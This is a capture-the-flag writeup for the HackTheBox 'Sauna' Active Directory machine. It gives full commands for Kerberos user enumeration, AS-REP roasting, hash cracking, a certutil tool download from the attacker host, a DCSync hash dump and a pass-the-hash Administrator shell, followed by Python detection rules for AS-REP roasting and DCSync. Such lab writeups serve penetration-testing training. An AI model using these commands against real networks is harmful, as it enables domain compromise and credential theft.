# HackTheBox - Sauna Writeup

###### tags: `writeup` `HackTheBox` `Sauna` `Easy` `OSCP` `Pass-The-Hash` `Evil-WinRM` `Kerbrute` `Impacket`

## :computer: Port Scanning

```bash
# Nmap 7.92 scan initiated Thu Aug 25 18:16:41 2022 as: nmap -sV -T4 -sT -sC -v -oN nmap 10.10.10.175
Nmap scan report for 10.10.10.175
Host is up (0.066s latency).
Not shown: 990 filtered tcp ports (no-response)
PORT    STATE SERVICE       VERSION
53/tcp  open  domain        Simple DNS Plus
80/tcp  open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: Egotistical Bank :: Home
88/tcp  open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-08-26 17:13:08Z)
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open  microsoft-ds?
464/tcp open  kpasswd5?
593/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp open  tcpwrapped
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 18h56m13s
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2022-08-26T17:13:17
|_  start_date: N/A

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Aug 25 18:17:41 2022 -- 1 IP address (1 host up) scanned in 59.48 seconds
```

- [ ] Port 53 : DNS Server
- [ ] Port 80 : HTTP Server
- [ ] Port 88 : Kerberos-sec
- [ ] Port 135 : MSRPC
- [ ] Port 139 : Netbios-ssn
- [ ] Port 389 : LDAP
- [ ] Port 445 : Microsoft-ds
- [ ] Port 464 : kpasswd5
- [ ] Port 593 : ncacn_http
- [ ] Port 636 : Tcpwrapped

## :eye: Enumeration

Since Kerberos is exposed (port 88), we are going to enumerate valid domain users with kerbrute:

```bash
# --dc points kerbrute at the KDC directly, so no DNS SRV lookup for the domain is needed
/opt/kerbrute/kerbrute_linux_amd64 userenum -d EGOTISTICAL-BANK.LOCAL --dc 10.10.10.175 /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
```

![](https://i.imgur.com/wxhYhZX.png)

## :bomb: Exploitation

After enumerating users it's time to try AS-REP roasting to obtain krb5asrep hashes. This only works against accounts that do not require Kerberos pre-authentication; in this case we can AS-REP roast the **fsmith** account with the following command.

```bash
# -dc-ip avoids relying on DNS to find the domain controller
impacket-GetNPUsers EGOTISTICAL-BANK.LOCAL/fsmith -no-pass -dc-ip 10.10.10.175
```

We obtain the hash and have to crack it; I use john.

![](https://i.imgur.com/BPtvbo9.png)

```bash
# "kerberos" is the file where the $krb5asrep$ hash from GetNPUsers was saved
john kerberos --wordlist=/usr/share/wordlists/rockyou.txt
```

We obtain the following password:

![](https://i.imgur.com/dHoWRb3.png)

##### Shell with evil-winrm

Knowing the user and the password, we can obtain a shell with evil-winrm using the following command:

```bash
evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23
```

Now it's time to start the privilege escalation.

---

### Root Privesc

First we are going to upload a copy of **winpeas** to enumerate the system. We have to start the HTTP server:

```bash
python3 -m http.server 80
```

I like to use certutil to download it onto the target machine:

```powershell
certutil -urlcache -f http://10.10.10.10/winPEASx64.exe winpeas.exe
```

```powershell
c:\Windows\System32\cmd.exe /c winpeas.exe
```

Reading the winpeas report, it found some autologon credentials:

![](https://i.imgur.com/La7lOTw.png)

With these credentials we can get a shell as svc_loanmanager with evil-winrm again, but this time we are going to use the bloodhound-python ingestor to enumerate the AD and find a path to Administrator credentials. Use the following command to obtain the JSON files that we then import into the BloodHound app. Here is a link that shows how to use [bloodhound](https://hackmd.io/@Mecanico/BJo-wm9x5).

```bash
# the password is quoted so the shell does not expand the trailing "!"
bloodhound-python -u svc_loanmgr -p 'Moneymakestheworldgoround!' -ns 10.10.10.175 -d EGOTISTICAL-BANK.LOCAL -c All
```

After importing the JSON files into BloodHound and running the query "Find Principals with DCSync Rights", we see that svc_loanmgr has them, so we can use impacket-secretsdump to perform the DCSync attack and dump the NTLM hashes, which we can then use to Pass-The-Hash.

```bash
impacket-secretsdump EGOTISTICAL-BANK.LOCAL/svc_loanmgr@10.10.10.175
```

After entering the password we receive a lot of hashes. Since these are NTLM hashes, we can use the second part of each entry, the NT hash, to pass the hash and obtain a shell as Administrator.

![](https://i.imgur.com/PK6AlUd.png)

Each dumped entry is composed of the account's username, the account ID (RID), the LM hash and the NT hash, all separated by colons. Using evil-winrm we can **Pass-The-Hash** and obtain the shell with the following command:

```bash
# replace NTHash with the Administrator NT hash (the last field of the dumped entry)
evil-winrm -i 10.10.10.175 -u Administrator -H NTHash
```

![](https://i.imgur.com/kZWeKrf.png)

And after that we are Domain Admins and we have Administrator rights so we can do everything we want!
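As a defender's counterpart to the two techniques used above (the AS-REP roasting of fsmith and the DCSync performed as svc_loanmgr), here is an added Python example, not part of the original writeup, of the detection logic for both over Windows Security events: Event ID 4768 with pre-authentication type 0 and an RC4 (0x17) ticket, and Event ID 4662 where a non-machine account requests the DS-Replication-Get-Changes control-access rights. The sample events are constructed, not taken from the box.

```python
# Control-access right GUIDs that DCSync needs (defined in the AD schema).
DS_REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPL_GET_CHANGES_FILTERED = "89e95b76-444d-4c62-991a-0facbeda640c"
REPL_GUIDS = {DS_REPL_GET_CHANGES, DS_REPL_GET_CHANGES_ALL, DS_REPL_GET_CHANGES_FILTERED}

# Constructed sample events, flattened to the fields a SIEM would index.
EVENTS = [
    # Normal TGT request: pre-auth used (type 2), AES256 ticket (0x12).
    {"EventID": 4768, "TargetUserName": "hsmith",
     "PreAuthType": "2", "TicketEncryptionType": "0x12"},
    # AS-REP roast: no pre-auth (type 0) and an RC4 ticket (0x17) for a user account.
    {"EventID": 4768, "TargetUserName": "fsmith",
     "PreAuthType": "0", "TicketEncryptionType": "0x17"},
    # Legitimate replication by the DC's own machine account.
    {"EventID": 4662, "SubjectUserName": "SAUNA$",
     "Properties": f"{{{DS_REPL_GET_CHANGES}}} {{{DS_REPL_GET_CHANGES_ALL}}}"},
    # DCSync: a user account requesting the same replication rights.
    {"EventID": 4662, "SubjectUserName": "svc_loanmgr",
     "Properties": f"{{{DS_REPL_GET_CHANGES}}} {{{DS_REPL_GET_CHANGES_ALL}}}"},
]

def is_asrep_roast(event):
    """4768 with PreAuthType 0 and RC4 (0x17) for a user account; krbtgt and
    machine accounts (names ending in $) are excluded to cut noise."""
    if event.get("EventID") != 4768:
        return False
    user = event.get("TargetUserName", "")
    return (event.get("PreAuthType") == "0"
            and event.get("TicketEncryptionType", "").lower() == "0x17"
            and not user.endswith("$") and user.lower() != "krbtgt")

def is_dcsync(event):
    """4662 where a non-machine account requests any replication control-access
    right; DCs replicate with their machine accounts, users should not."""
    if event.get("EventID") != 4662:
        return False
    props = event.get("Properties", "").lower()
    return (any(g in props for g in REPL_GUIDS)
            and not event.get("SubjectUserName", "").endswith("$"))

def triage(events):
    """Return (technique, account) pairs for every event that matches a rule."""
    hits = []
    for e in events:
        if is_asrep_roast(e):
            hits.append(("AS-REP roasting", e["TargetUserName"]))
        if is_dcsync(e):
            hits.append(("DCSync", e["SubjectUserName"]))
    return hits
```

Running `triage(EVENTS)` flags only the fsmith AS-REP request and the svc_loanmgr replication request; the normal logon and the DC machine account's replication pass clean.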
---

### You can find me on:

:bird: [**Twitter**](https://twitter.com/Aka_Mecanico)
:desktop_computer: [**Github**](https://github.com/Mec4nico)
:ballot_box_with_check: [**TryHackMe**](https://tryhackme.com/p/mech4nico)
:green_book: [**HackTheBox**](https://www.hackthebox.eu/home/users/profile/336092)